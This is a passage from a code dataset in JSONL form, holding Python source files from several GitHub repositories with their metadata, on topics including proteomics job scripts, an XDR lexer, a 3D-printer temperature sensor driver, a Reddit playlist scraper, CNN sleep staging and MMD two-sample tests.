comment\n p.StartElementHandler = start_element\n p.EndElementHandler = end_element\n p.CharacterDataHandler = char_data\n \n with open(input_filename, 'rb') as input_file:\n p.ParseFile(input_file)\n","repo_name":"EricSeynaeve/landwijzer_werkstuk","sub_path":"bin/xml2lyx.py","file_name":"xml2lyx.py","file_ext":"py","file_size_in_byte":3548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"952276593","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport re\nimport stat\n\nusage_mesg = 'Usage: prepare-tandemK-high.py '\n\nmzXML_dir = sys.argv[1]\nfilename_fasta_pro = sys.argv[2]\ndb_name = re.sub('.pro$','', 
os.path.basename(filename_fasta_pro))\ndb_name = re.sub('.fasta$','',db_name)\ndb_name = re.sub('.fa$','',db_name)\n\nabs_path_script = os.path.abspath(__file__)\nMSTB_HOME = os.path.abspath( os.path.join(abs_path_script, '..', '..') )\n\nfilename_taxon_xml = 'tandem-taxonomy.xml'\nfilename_taxon_tmpl = os.path.join(MSTB_HOME,'search','tmpl',filename_taxon_xml)\n\nfilename_tandem_xml = 'tandemK.low.xml'\nfilename_in_tmpl = os.path.join(MSTB_HOME,'search','tmpl',filename_tandem_xml)\n\nfilename_sh = 'run-tandemK.sh'\nfilename_tandem_exe = os.path.join(MSTB_HOME,'extern','tandem.linux.exe') \nfilename_default_xml = os.path.join(MSTB_HOME,'search','isb_default_input_kscore.xml')\n\nf_taxon_tmpl = open(filename_taxon_tmpl,'r')\ntaxon_tmpl = ''.join( f_taxon_tmpl.readlines() )\nf_taxon_tmpl.close()\n\nsys.stderr.write('Write %s.\\n'%filename_taxon_xml)\nf_taxon = open(filename_taxon_xml,'w')\nf_taxon.write( taxon_tmpl.format(DB_FASTAPRO=filename_fasta_pro, DB_NAME=db_name) )\nf_taxon.close()\n\nf_in_tmpl = open(filename_in_tmpl,'r')\nin_tmpl = ''.join( f_in_tmpl.readlines() )\nf_in_tmpl.close()\n\nf_sh = open(filename_sh,'w')\nf_sh.write('#!/bin/bash\\n')\nfor filename in os.listdir(mzXML_dir):\n if( not filename.upper().endswith('.MZXML') ):\n continue\n filename_base = '.'.join(filename.split('.')[:-1])\n filename_in = '%s.%s.tandemK.xml'%(filename_base,db_name)\n\n in_params = dict()\n in_params['DB_NAME'] = db_name\n in_params['TANDEMK_DEFAULT_PARAM'] = filename_default_xml\n in_params['FILENAME_TAXON'] = filename_taxon_xml\n in_params['FILENAME_MZXML'] = os.path.abspath(os.path.join(mzXML_dir, filename))\n filename_out = '%s.%s.tandemK.out'%(filename_base,db_name)\n in_params['FILENAME_OUT'] = filename_out\n in_params['FILENAME_LOG'] = '%s.%s.tandemK.log'%(filename_base,db_name)\n\n sys.stderr.write('Write %s.\\n'%filename_in)\n f_in = open(filename_in,'w')\n f_in.write( in_tmpl.format(**in_params) )\n f_in.close()\n \n f_sh.write(\"%s %s\\n\"%(filename_tandem_exe, filename_in))\nf_sh.close()\n\nos.chmod(filename_sh,stat.S_IRWXU)\nsys.stderr.write('\\nTandemK is ready. 
Run %s.\\n\\n'%(filename_sh))\n","repo_name":"marcottelab/MSblender","sub_path":"msblender-scripts/prepare-tandemK-low.py","file_name":"prepare-tandemK-low.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"22187868104","text":"\"\"\"MNIST dataset generation and dataloader\r\n\"\"\"\r\n\r\nimport torch\r\nimport torchvision\r\nimport numpy as np\r\nfrom .utils_dataset import TransformsDataset\r\n\r\nclass ToBinary(object):\r\n def __init__(self, class_0):\r\n self.class_0 = class_0\r\n \r\n def __call__(self, label):\r\n return np.float32([not (label == self.class_0)])\r\n \r\n def __repr__(self):\r\n return self.__class__.__name__ + '()'\r\n\r\nclass Subset(torch.utils.data.sampler.SubsetRandomSampler):\r\n def __iter__(self):\r\n return (self.indices[i] for i in range(len(self.indices)))\r\n \r\ndef get_dataloaders(opt, mode):\r\n mode_ = 'train' if mode=='train' else opt.split_validation\r\n mnist_dataset = torchvision.datasets.MNIST('./', train=mode_!='test', download=True,\r\n transform=torchvision.transforms.Compose([\r\n torchvision.transforms.ToTensor(),\r\n torchvision.transforms.Normalize(\r\n (0.5,), (0.5,))\r\n ]))\r\n \r\n valid_size = 0.1\r\n num_train = len(mnist_dataset)\r\n indices = []\r\n \r\n # only using the two selected classes\r\n for i in range(len(mnist_dataset)):\r\n if mnist_dataset[i][1] in [opt.class_0_mnist, opt.class_1_mnist]:\r\n indices.append(i)\r\n \r\n if mode_!='test':\r\n valid_size = 0.1\r\n num_train = len(indices)\r\n split = int(valid_size * num_train)\r\n # get a fixed random validation set for every run\r\n np.random.RandomState(0).shuffle(indices)\r\n indices = {'train':indices[split:], 'val':indices[:split]}[mode_]\r\n \r\n mnist_dataset = TransformsDataset(mnist_dataset, ToBinary(opt.class_0_mnist), i=1)\r\n if mode=='train':\r\n sampler = torch.utils.data.sampler.SubsetRandomSampler\r\n else:\r\n sampler = Subset\r\n \r\n return torch.utils.data.DataLoader(mnist_dataset, \r\n batch_size=opt.batch_size, sampler=sampler(indices), num_workers=0)","repo_name":"ricbl/gradient-direction-of-robust-models","sub_path":"src/direct_method/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8504655862","text":"from django.urls import path\n\nfrom advanced_report_builder.views.datatables import TableModal, FieldModal\n\napp_name = 'report_builder'\n\n\nurlpatterns = [\n path('table/modal//', TableModal.as_view(), name='table_modal'),\n path('table/modal/field//', FieldModal.as_view(), name='field_modal'),\n]\n","repo_name":"nagwagabr74/plots","sub_path":"env/Lib/site-packages/advanced_report_builder/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1409189138","text":"# SPDX-License-Identifier: LGPL-2.1-or-later\n\nimport abc\n\n\nclass XDRReader:\n def __init__(self, fp):\n self.fp = fp\n self.lookahead = \"\"\n self.lookbehind = \"\"\n self.line = 1\n self.column = 0\n\n def _read(self):\n if len(self.lookahead) > 0:\n c = self.lookahead[0:1]\n self.lookahead = self.lookahead[1:]\n return c\n return self.fp.read(1)\n\n def peek(self, skip=0):\n need = 1 + skip\n if len(self.lookahead) < need:\n self.lookahead = self.lookahead + self.fp.read(need - len(self.lookahead))\n if 
len(self.lookahead) < need:\n return None\n\n return self.lookahead[skip : skip + 1]\n\n def last(self, skip=0):\n if (skip + 1) > len(self.lookbehind):\n return None\n return self.lookbehind[skip]\n\n def next(self):\n c = self._read()\n line = self.line\n column = self.column\n if c == \"\\n\":\n self.line = self.line + 1\n self.column = 0\n else:\n self.column = self.column + 1\n self.lookbehind = c + self.lookbehind\n if len(self.lookbehind) > 2:\n self.lookbehind = self.lookbehind[0:2]\n return c, line, column\n\n\nclass XDRToken(abc.ABC):\n def __init__(self, line, column, value):\n self.line = line\n self.column = column\n self.value = value\n\n def __eq__(self, other):\n return (\n type(self) is type(other)\n and self.line == other.line\n and self.column == other.column\n and self.value == other.value\n )\n\n @classmethod\n @abc.abstractmethod\n def start(cls, reader):\n pass\n\n @classmethod\n @abc.abstractmethod\n def end(cls, reader):\n pass\n\n @classmethod\n def consume(cls, reader):\n c, line, col = reader.next()\n buf = c\n while True:\n if cls.end(reader):\n break\n c, _, _ = reader.next()\n buf = buf + c\n return cls(line, col, buf)\n\n def __repr__(self):\n return \"%s{line=%d,col=%d,value={{{%s}}}}\" % (\n self.__class__.__name__,\n self.line,\n self.column,\n self.value,\n )\n\n\nclass XDRTokenComment(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.peek() == \"/\" and reader.peek(skip=1) == \"*\"\n\n @classmethod\n def end(cls, reader):\n c1 = reader.last(skip=1)\n c2 = reader.last()\n if c1 == \"*\" and c2 == \"/\":\n return True\n\n if reader.peek() is None:\n raise Exception(\n \"EOF before closing comment starting at %d:%d\"\n % (reader.line, reader.column)\n )\n\n\nclass XDRTokenIdentifier(XDRToken):\n @classmethod\n def start(cls, reader):\n c = reader.peek()\n return c.isalpha()\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n if c is None:\n return True\n return not c.isalnum() and c != \"_\"\n\n\nclass XDRTokenPunctuation(XDRToken):\n @classmethod\n def start(cls, reader):\n c = reader.peek()\n return c in [\";\", \"=\", \"{\", \"}\", \",\", \"[\", \"]\", \"<\", \">\", \"*\", \"(\", \")\", \":\"]\n\n @classmethod\n def end(cls, reader):\n return True\n\n\nclass XDRTokenConstant(XDRToken):\n @classmethod\n def start(cls, reader):\n c1 = reader.peek()\n c2 = reader.peek(skip=1)\n return c1.isdecimal() or (c1 == \"-\" and c2 is not None and c2.isdecimal())\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n return (\n not c.isdecimal()\n and not c == \".\"\n and not c.lower() in [\"x\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\"]\n )\n\n\nclass XDRTokenCEscape(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.column == 0 and reader.peek() == \"%\"\n\n @classmethod\n def end(cls, reader):\n return reader.peek() == \"\\n\"\n\n\nclass XDRTokenSpace(XDRToken):\n @classmethod\n def start(cls, reader):\n return reader.peek().isspace()\n\n @classmethod\n def end(cls, reader):\n c = reader.peek()\n return c is None or not c.isspace()\n\n\nclass XDRLexer:\n def __init__(self, fp):\n self.reader = XDRReader(fp)\n self.lookahead = []\n\n def _token(self):\n tokenTypes = [\n XDRTokenComment,\n XDRTokenIdentifier,\n XDRTokenCEscape,\n XDRTokenPunctuation,\n XDRTokenConstant,\n XDRTokenSpace,\n ]\n while True:\n if self.reader.peek() is None:\n return None\n\n for tokenType in tokenTypes:\n if tokenType.start(self.reader):\n ret = tokenType.consume(self.reader)\n if type(ret) not in [XDRTokenSpace, XDRTokenComment]:\n 
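                        # Whitespace and comment tokens are consumed here but never surfaced, so callers only ever see meaningful tokens. A hypothetical session: XDRLexer(io.StringIO('struct foo { int a; };')) yields identifier and punctuation tokens with all spacing dropped.\n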
return ret\n\n def next(self):\n if len(self.lookahead) > 0:\n token = self.lookahead[0]\n self.lookahead = self.lookahead[1:]\n return token\n return self._token()\n\n def peek(self):\n if len(self.lookahead) == 0:\n token = self._token()\n if token is None:\n return None\n self.lookahead.append(token)\n return self.lookahead[0]\n","repo_name":"libvirt/libvirt","sub_path":"scripts/rpcgen/rpcgen/lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":1243,"dataset":"github-code","pt":"19"} +{"seq_id":"11332346279","text":"#Import Libraries\nimport cv2\nimport numpy as np\n\nimg = cv2.imread('assets/bug1.png',0)\nimg = cv2.resize(img,(400,400))\nimg = cv2.bitwise_not(img)\ncv2.imshow('Original',img)\n\n#define the kernal\nkernal = np.ones((3,3),np.uint8)\n\n#erosion of the image ie.removes pixels on object boundaries \nerosion = cv2.erode(img,kernal,iterations = 9)\ncv2.imshow('erosion method',erosion)\n\n#Dilation adds pixels to the boundaries of objects in an image\ndilation = cv2.dilate(img,kernal,iterations = 9)\ncv2.imshow('Dilation',dilation)\n\n\n\n\nopening = cv2.morphologyEx(img,cv2.MORPH_OPEN,kernal,iterations = 9)\ncv2.imshow('Opening',opening)\n\n#The closing operation dilates an image and then erodes the dilated image \nclosing = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernal,iterations = 9)\ncv2.imshow('Closing',closing)\n\n\n\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"Jem1D/DIP-codes","sub_path":"exp10_morph.py","file_name":"exp10_morph.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23948115333","text":"import logging\nfrom . import bus\n\nLM75_CHIP_ADDR = 0x48\nLM75_I2C_SPEED = 100000\nLM75_REGS = {\n 'TEMP' : 0x00,\n 'CONF' : 0x01,\n 'THYST' : 0x02,\n 'TOS' : 0x03,\n 'PRODID' : 0x07 # TI LM75A chips only?\n}\nLM75_REPORT_TIME = .8\n# Temperature can be sampled at any time but the read aborts\n# the current conversion. Conversion time is 300ms so make\n# sure not to read too often.\nLM75_MIN_REPORT_TIME = .5\n\nclass LM75:\n def __init__(self, config):\n self.printer = config.get_printer()\n self.name = config.get_name().split()[-1]\n self.reactor = self.printer.get_reactor()\n self.i2c = bus.MCU_I2C_from_config(config, LM75_CHIP_ADDR,\n LM75_I2C_SPEED)\n self.mcu = self.i2c.get_mcu()\n self.report_time = config.getfloat('lm75_report_time', LM75_REPORT_TIME,\n minval=LM75_MIN_REPORT_TIME)\n self.temp = self.min_temp = self.max_temp = 0.0\n self.sample_timer = self.reactor.register_timer(self._sample_lm75)\n self.printer.add_object(\"lm75 \" + self.name, self)\n self.printer.register_event_handler(\"klippy:connect\",\n self.handle_connect)\n\n def handle_connect(self):\n self._init_lm75()\n self.reactor.update_timer(self.sample_timer, self.reactor.NOW)\n\n def setup_minmax(self, min_temp, max_temp):\n self.min_temp = min_temp\n self.max_temp = max_temp\n\n def setup_callback(self, cb):\n self._callback = cb\n\n def get_report_time_delta(self):\n return self.report_time\n\n def degrees_from_sample(self, x):\n # The temp sample is encoded in the top 9 bits of a 16-bit\n # value. 
Resolution is 0.5 degrees C.\n return x[0] + (x[1] >> 7) * 0.5\n\n def _init_lm75(self):\n # Check and report the chip ID but ignore errors since many\n # chips don't have it\n try:\n prodid = self.read_register('PRODID', 1)[0]\n logging.info(\"lm75: Chip ID %#x\" % prodid)\n except:\n pass\n\n def _sample_lm75(self, eventtime):\n try:\n sample = self.read_register('TEMP', 2)\n self.temp = self.degrees_from_sample(sample)\n except Exception:\n logging.exception(\"lm75: Error reading data\")\n self.temp = 0.0\n return self.reactor.NEVER\n\n if self.temp < self.min_temp or self.temp > self.max_temp:\n self.printer.invoke_shutdown(\n \"LM75 temperature %0.1f outside range of %0.1f:%.01f\"\n % (self.temp, self.min_temp, self.max_temp))\n\n measured_time = self.reactor.monotonic()\n self._callback(self.mcu.estimated_print_time(measured_time), self.temp)\n return measured_time + self.report_time\n\n def read_register(self, reg_name, read_len):\n # read a single register\n regs = [LM75_REGS[reg_name]]\n params = self.i2c.i2c_read(regs, read_len)\n return bytearray(params['response'])\n\n def write_register(self, reg_name, data):\n if type(data) is not list:\n data = [data]\n reg = LM75_REGS[reg_name]\n data.insert(0, reg)\n self.i2c.i2c_write(data)\n\n def get_status(self, eventtime):\n return {\n 'temperature': round(self.temp, 2),\n }\n\n\ndef load_config(config):\n # Register sensor\n pheaters = config.get_printer().load_object(config, \"heaters\")\n pheaters.add_sensor_factory(\"LM75\", LM75)\n","repo_name":"Klipper3d/klipper","sub_path":"klippy/extras/lm75.py","file_name":"lm75.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","stars":7817,"dataset":"github-code","pt":"19"} +{"seq_id":"19653990319","text":"from flask import Blueprint\nfrom flask import flash\nfrom flask import g\nfrom flask import redirect\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom werkzeug.exceptions import abort\nimport praw\nfrom praw.models import MoreComments\nfrom google.cloud import language\nfrom google.cloud.language import enums\nfrom google.cloud.language import types\nfrom gmusicapi import Mobileclient\nfrom uuid import getnode as getmac\nfrom scrapper.google_config import g_music\nimport os\n\nimport re\n\nreddit_app_id = os.getenv(\"SCRAPPER_REDDIT_ID\")\nreddit_app_secret = os.getenv(\"SCRAPPER_REDDIT_SECRET\")\nreddit = praw.Reddit(user_agent=\"Comment Extraction\",\n client_id=reddit_app_id, client_secret=reddit_app_secret)\n\nclient = language.LanguageServiceClient()\n\nbp = Blueprint(\"reddit\", __name__)\n\n\n@bp.route(\"/\", methods=(\"GET\", \"POST\"))\ndef index():\n song_match_regexp = r\"^(.*)\\s(by|-)([A-Za-z\\t ]+)+\"\n \"\"\"Scrape a reddit post.\"\"\"\n if request.method == \"POST\":\n url = request.form[\"url\"]\n playlist = request.form[\"playlist\"]\n error = None\n \n\n if not url:\n error = \"URL is required.\"\n if not playlist:\n playlist = \"Songs from Reddit \" + url\n if error is not None:\n flash(error)\n else:\n print(\"Parsing the following URL: \" + url) \n \n song_ids = []\n submission = reddit.submission(url=url)\n songs = []\n submission.comment_sort = \"top\"\n submission.comments.replace_more(limit=1)\n exclude_words = [\"SONG\", \"COMMENT\", \"ICON\", \"COMMENTS\", \"SONGS\", \"ICONS\", \"ALBUM\", \"ALBUMS\"]\n print(\"Fetching top comments\")\n for top_level_comment in submission.comments:\n # We only want short-ish replies as we're looking for songs and not meta or chatter\n 
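            # Only comments under 150 characters are considered; those matching the \"Song by Artist\" / \"Song - Artist\" pattern are taken verbatim, and the rest go through the Cloud Natural Language entity extractor below.\n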
if len(top_level_comment.body) < 150: \n cleaned_comment = clean(top_level_comment.body)\n if re.match(song_match_regexp, cleaned_comment, re.IGNORECASE):\n song_match = re.match(song_match_regexp, cleaned_comment)\n song_to_search = song_match.group(1) + \" \" + song_match.group(2) + \" \" + song_match.group(3)\n songs.append(song_to_search)\n else:\n print(\"Extracting entities\")\n document = types.Document(\n content=cleaned_comment,\n type=enums.Document.Type.PLAIN_TEXT) \n # Extract entities of the comments\n entities = client.analyze_entities(document=document).entities\n # If the entity is either work of art or a person, append it to the list.\n song_and_artist = []\n for entity in entities: \n # entity type number 5 is WORK_OF_ART \n if (entity.type == 5 and entity.name.upper() not in exclude_words) or entity.type == 1:\n song_and_artist.append(entity.name)\n if len(song_and_artist) > 0:\n songs.append(\" - \".join(song_and_artist))\n\n print(\"Matching songs with Google play music\")\n for song in songs: \n search_result = g_music.search(song, max_results=20) \n print(\"Searching for \" + song)\n if(\"song_hits\" in search_result):\n if len(search_result[\"song_hits\"]) > 0:\n song_id = search_result[\"song_hits\"][0][\"track\"][\"storeId\"]; \n song_ids.append(song_id) \n \n print(\"Creating playist: \" + playlist)\n playist_id = g_music.create_playlist(playlist, \"\", True)\n print(\"adding songs to playlist\" + playist_id )\n g_music.add_songs_to_playlist(playist_id, song_ids) \n return render_template(\"reddit/index.html\", posts=songs, google_auth = g_music.is_authenticated())\n\n return render_template(\"reddit/index.html\", google_auth = g_music.is_authenticated())\n\ndef clean(comment):\n comment = re.sub(r'https?:\\/\\/.*[\\r\\n]*', '', comment, flags=re.MULTILINE)\n comment = comment.replace(\"[\", \"\").replace(\"(\", \"\").replace(\"]\", \"\").replace(\")\", \"\")\n return comment\n\n","repo_name":"jeremy-albuixech/scrapper","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11857684544","text":"import glob\nimport numpy\nimport CNNTransform\n\nresnet = CNNTransform.resnet18()\n\ndef dist_prob(a, x):\n d = numpy.exp(((a - x)**2).sum(1))\n return d / d.sum()\n\nclass DeepMatch():\n def __init__(self, vector_dir=\"vectors\"):\n files = glob.glob(vector_dir + \"/*.csv\")\n labels = []\n V = []\n\n for f in files:\n print(\"Loading: \", f)\n labels.append(f.split(\"/\")[-1].split(\".\")[0])\n V.append(numpy.loadtxt(f, delimiter=\",\"))\n\n self.V = numpy.vstack(V)\n self.labels = numpy.hstack(labels)\n\n def predict(self, X):\n T = resnet.transform(X)\n\n # similarity\n D = [dist_prob(self.V, x).ravel() for x in T.detach().numpy()]\n\n p = []\n for d in D:\n idx = d.argsort()[:5]\n p.append(dict(zip(self.labels[idx], d[idx].tolist())))\n print(p)\n return p\n\n\nif __name__ == '__main__':\n from optparse import OptionParser\n\n parser = OptionParser()\n parser.add_option(\"-i\", \"--image\", dest=\"image\",\n help=\"Path to image\")\n","repo_name":"radolalaina/deeplearning","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38345208009","text":"# File: Untrained CNN\r\n# Description: This program allows the user to train and save a new CNN.\r\n# Institution: University of Texas at 
Austin, Department of Biomedical Engineering\r\n# Developer: Shao-Po (Shawn) Huang\r\n# Team Members: Bryce Carr, Ajay Gadwal, Ethan Muyskens, Christian Schonhoeft\r\n\r\n# Date Last Modified: 05/11/20\r\n\r\n# This program uses keras and joblib.\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dropout\r\nfrom keras.layers.convolutional import Conv1D\r\nfrom keras.layers.convolutional import MaxPooling1D\r\nfrom keras.utils import to_categorical\r\nimport joblib\r\n\r\n# Helpful resource for building convolutional neural network:\r\n# https://machinelearningmastery.com/cnn-models-for-human-activity-recognition-time-series-classification/\r\n\r\n# Documentation for keras:\r\n# https://keras.io/\r\n\r\n# Source for CNN design:\r\n# Yildirim O, Baloglu UB, Acharya UR. A Deep Learning Model for Automated Sleep Stages Classification Using PSG Signals.\r\n# Int J Environ Res Public Health. 2019;16(4):599. Published 2019 Feb 19. doi:10.3390/ijerph16040599\r\n\r\n# Build the CNN\r\nn_timesteps, n_features, n_outputs = trainX.shape[1], trainX.shape[2], trainy.shape[1]\r\nmodel = Sequential()\r\nmodel.add(Conv1D(filters=64, kernel_size=5, strides=3, activation='relu', input_shape=(n_timesteps,n_features)))\r\nmodel.add(Conv1D(filters=128, kernel_size=5, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Conv1D(filters=128, kernel_size=13, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=256, kernel_size=7, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=256, kernel_size=7, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=4, strides=1, activation='relu')) \r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=32, kernel_size=3, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=64, kernel_size=6, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Conv1D(filters=8, kernel_size=5, strides=1, activation='relu'))\r\nmodel.add(Conv1D(filters=8, kernel_size=2, strides=1, activation='relu'))\r\nmodel.add(MaxPooling1D(pool_size=2, strides=2))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dropout(0.2))\r\nmodel.add(Dense(n_outputs, activation='softmax'))\r\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n\r\n# Fit the CNN\r\nmodel.fit(trainX, trainy, epochs=100, verbose=2, batch_size=32)\r\n\r\n# Save trained CNN by providing destination\r\njoblib.dump(model,PATH_CNN)\r\n","repo_name":"shawnh871/Sleep_Stage_Classification","sub_path":"Untrained_CNN.py","file_name":"Untrained_CNN.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23089104183","text":"\"\"\"add category, message_type and message table\n\nRevision ID: 27ce67ba5f4d\nRevises: 0dbc42ae52bd\nCreate Date: 2020-08-04 20:40:09.626568\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '27ce67ba5f4d'\ndown_revision = '0dbc42ae52bd'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('categories',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('c_name', sa.String(length=50), nullable=False),\n sa.Column('c_descripton', sa.String(length=100), nullable=True),\n sa.Column('c_thumbnail', sa.String(length=50), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('message_types',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('t_name', sa.String(length=50), nullable=False),\n sa.Column('t_description', sa.String(length=100), nullable=True),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('m_title', sa.String(length=100), nullable=True),\n sa.Column('m_description', sa.String(length=200), nullable=True),\n sa.Column('type_id', sa.Integer(), nullable=False),\n sa.Column('m_thumbnail', sa.String(length=100), nullable=True),\n sa.Column('m_link', sa.String(length=200), nullable=True),\n sa.Column('m_duration', sa.String(length=50), nullable=True),\n sa.Column('m_broadcast', sa.Boolean(), nullable=False),\n sa.Column('created_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.Column('updated_at', sa.DateTime(), server_default=sa.text('now()'), nullable=True),\n sa.ForeignKeyConstraint(['type_id'], ['message_types.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('messages_categories',\n sa.Column('message_id', sa.Integer(), nullable=False),\n sa.Column('category_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['category_id'], ['categories.id'], ),\n sa.ForeignKeyConstraint(['message_id'], ['messages.id'], ),\n sa.PrimaryKeyConstraint('message_id', 'category_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('messages_categories')\n op.drop_table('messages')\n op.drop_table('message_types')\n op.drop_table('categories')\n # ### end Alembic commands ###\n","repo_name":"pat64j/dante-backend","sub_path":"migrations/versions/27ce67ba5f4d_add_category_message_type_and_message_.py","file_name":"27ce67ba5f4d_add_category_message_type_and_message_.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35851290015","text":"\"\"\"\nThe methods here are taken from Liu et al\nhttps://github.com/fengliu90/DK-for-TST/blob/master/Baselines_Blob.py\n\"\"\"\nfrom sklearn.utils import check_random_state\nfrom argparse import Namespace\nimport argparse\nimport os\nimport numpy as np\nimport torchvision.transforms as transforms\nimport torchvision.transforms.functional as TF\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch\nimport pickle\nfrom tqdm.auto import tqdm\nfrom utils_HD import MatConvert, MMDu, TST_MMD_u\nfrom mmdvar import IncomMMDVar, ComMMDVar, h1_mean_var_gram\n\n# Setup seeds\nnp.random.seed(1102)\ntorch.manual_seed(1102)\ntorch.cuda.manual_seed(1102)\ntorch.backends.cudnn.deterministic = True\nis_cuda = True\n\ndtype = torch.float\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else 'cpu')\ncuda = True if torch.cuda.is_available() else False\n\n\ndef deep_mmd_not_image(sample_p, sample_q, use_1sample_U, complete, n_epochs=1000):\n assert sample_p.shape[1] == sample_q.shape[1]\n sample_p = np.array(sample_p, dtype='float32')\n sample_q = np.array(sample_q, dtype='float32')\n \n # Setup for all experiments\n alpha = 0.05 # test threshold\n x_in = sample_p.shape[1] # number of neurons in the input layer, i.e., dimension of data\n H = 50 # number of neurons in the hidden layer\n x_out = 50 # number of neurons in the output layer\n learning_rate = 0.0005 # learning rate for MMD-D on Blob\n N_epoch = n_epochs # number of training epochs\n\n # prepare datasets\n sample_p = torch.from_numpy(sample_p)\n sample_q = torch.from_numpy(sample_q)\n \n # split data 50/50\n x_train, x_test = sample_p[:len(sample_p)//2], sample_p[len(sample_p)//2:]\n y_train, y_test = sample_q[:len(sample_q) // 2], sample_q[len(sample_q) // 2:]\n\n # Initialize parameters\n model_u = ModelLatentF(x_in, H, x_out)\n if cuda:\n model_u.cuda()\n epsilonOPT = MatConvert(np.random.rand(1) * (10 ** (-10)), device, dtype)\n epsilonOPT.requires_grad = True\n sigmaOPT = MatConvert(np.sqrt(np.random.rand(1) * 0.3), device, dtype)\n sigmaOPT.requires_grad = True\n sigma0OPT = MatConvert(np.sqrt(np.random.rand(1) * 0.002), device, dtype)\n sigma0OPT.requires_grad = True\n\n # Setup optimizer for training deep kernel\n optimizer_u = torch.optim.Adam(list(model_u.parameters())+[epsilonOPT]+[sigmaOPT]+[sigma0OPT], lr=learning_rate) #\n\n # Train deep kernel to maximize test power\n S = torch.cat([x_train.cpu(), y_train.cpu()], 0).to(device)\n # S = MatConvert(S, device, dtype)\n N1 = len(x_train)\n np.random.seed(seed=1102)\n torch.manual_seed(1102)\n torch.cuda.manual_seed(1102)\n for t in tqdm(range(N_epoch)):\n # Compute epsilon, sigma and sigma_0\n ep = torch.exp(epsilonOPT)/(1+torch.exp(epsilonOPT))\n sigma = sigmaOPT ** 2\n sigma0_u = sigma0OPT ** 2\n # Compute output of the deep network\n modelu_output = model_u(S)\n # Compute J (STAT_u)\n TEMP = MMDu(modelu_output, N1, S, sigma, sigma0_u, ep, 
